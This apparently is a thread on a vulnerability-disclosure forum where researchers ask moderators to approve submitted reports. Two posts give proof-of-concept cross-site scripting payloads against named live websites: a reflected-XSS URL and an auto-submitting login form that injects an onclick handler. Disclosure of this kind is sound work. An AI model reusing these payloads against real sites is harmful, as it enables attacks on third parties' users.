Manual Approval Thread

Questions or requests about submissions
User avatar
x1admin
Site Admin
Posts: 3061
Joined: Sun Nov 15, 2015 7:04 pm

Re: Manual Approval Thread

Post by x1admin » Tue Mar 30, 2021 6:28 am

approved

amlnspqr
Posts: 268
Joined: Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Tue Mar 30, 2021 2:11 pm

Thanks!

JonLaing4
Posts: 19
Joined: Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Tue Mar 30, 2021 6:34 pm

Hello,

Please approve ID 1970185

You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Screenshot from 2021-03-30 19-35-33.png
Screenshot from 2021-03-30 19-35-33.png (49.97 KiB) Viewed 556 times
Many thanks,

amlnspqr
Posts: 268
Joined: Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Wed Mar 31, 2021 9:07 am

1970226 Alt + Shift +X
1970272, 1970286, 1970934 wait for the page to load

JonLaing4
Posts: 19
Joined: Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Wed Mar 31, 2021 7:33 pm

JonLaing4 wrote:
Tue Mar 30, 2021 6:34 pm
Hello,

Please approve ID 1970185

You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:

Screenshot from 2021-03-30 19-35-33.png

Many thanks,
This has been noted as "Can't Reproduce Vulnerability" but if you do as I've said by going to the url "https://shipafrika.com/track_shipment.p ... BOUNTY%27)+" you will get xss popup. You need to remember the + at the end.

<p>Click Here: <a href="https://shipafrika.com/track_shipment.p ... XSS</a></p>
Screenshot from 2021-03-31 20-33-56.png
Screenshot from 2021-03-31 20-33-56.png (34.99 KiB) Viewed 499 times
This screenshot is from the above url using Chrome.

And this one is from Firefox:

Screenshot from 2021-03-31 20-35-05.png
Screenshot from 2021-03-31 20-35-05.png (44.1 KiB) Viewed 499 times
Please move to approved/On Hold

amlnspqr
Posts: 268
Joined: Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Thu Apr 01, 2021 8:46 pm

1971939 Chrome, wait for the page to load, if doesn't work try a few more times

Rbcafe
Posts: 59
Joined: Wed Oct 05, 2016 10:52 am

Re: Manual Approval Thread

Post by Rbcafe » Sun Apr 04, 2021 6:17 am

Greetings,

Can you check :

1973969
1952022
1951722

Best regards,

Rbcafe

JonLaing4
Posts: 19
Joined: Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Mon Apr 05, 2021 3:13 pm

Hello,
Please approve ID 1975311

You can copy and paste this into a browser and you will get xss popup when the site loads click on the Password box:

data:text/html,<form method='POST' action='https%3A%2F%2Fwww.awpwriter.org%2Fuser%2Flogin'><input name='email' value=''><input name='password' value='%26%2334%3Bonclick%3Dconfirm%28%29%20'><input name='redirect_url' value='https%3A%2F%2Fwww.awpwriter.org%2F'></form><script>document.forms[0].submit()</script>

Screenshot from 2021-04-05 16-10-55.png
Screenshot from 2021-04-05 16-10-55.png (67.4 KiB) Viewed 335 times

Rbcafe
Posts: 59
Joined: Wed Oct 05, 2016 10:52 am

Re: Manual Approval Thread

Post by Rbcafe » Tue Apr 06, 2021 7:07 am

Greetings,

Can you check :

1973971
1973969
1973968
1973967

Best regards,

Rbcafe

amlnspqr
Posts: 268
Joined: Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Tue Apr 06, 2021 12:05 pm

amlnspqr wrote:
Wed Mar 31, 2021 9:07 am
1970226 Alt + Shift +X
1970272, 1970286, 1970934 wait for the page to load
amlnspqr wrote:
Thu Apr 01, 2021 8:46 pm
1971939 Chrome, wait for the page to load, if doesn't work try a few more times
Also 1972194, 1972206, 1972431, 1976833. Some of them seem patched already though.

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest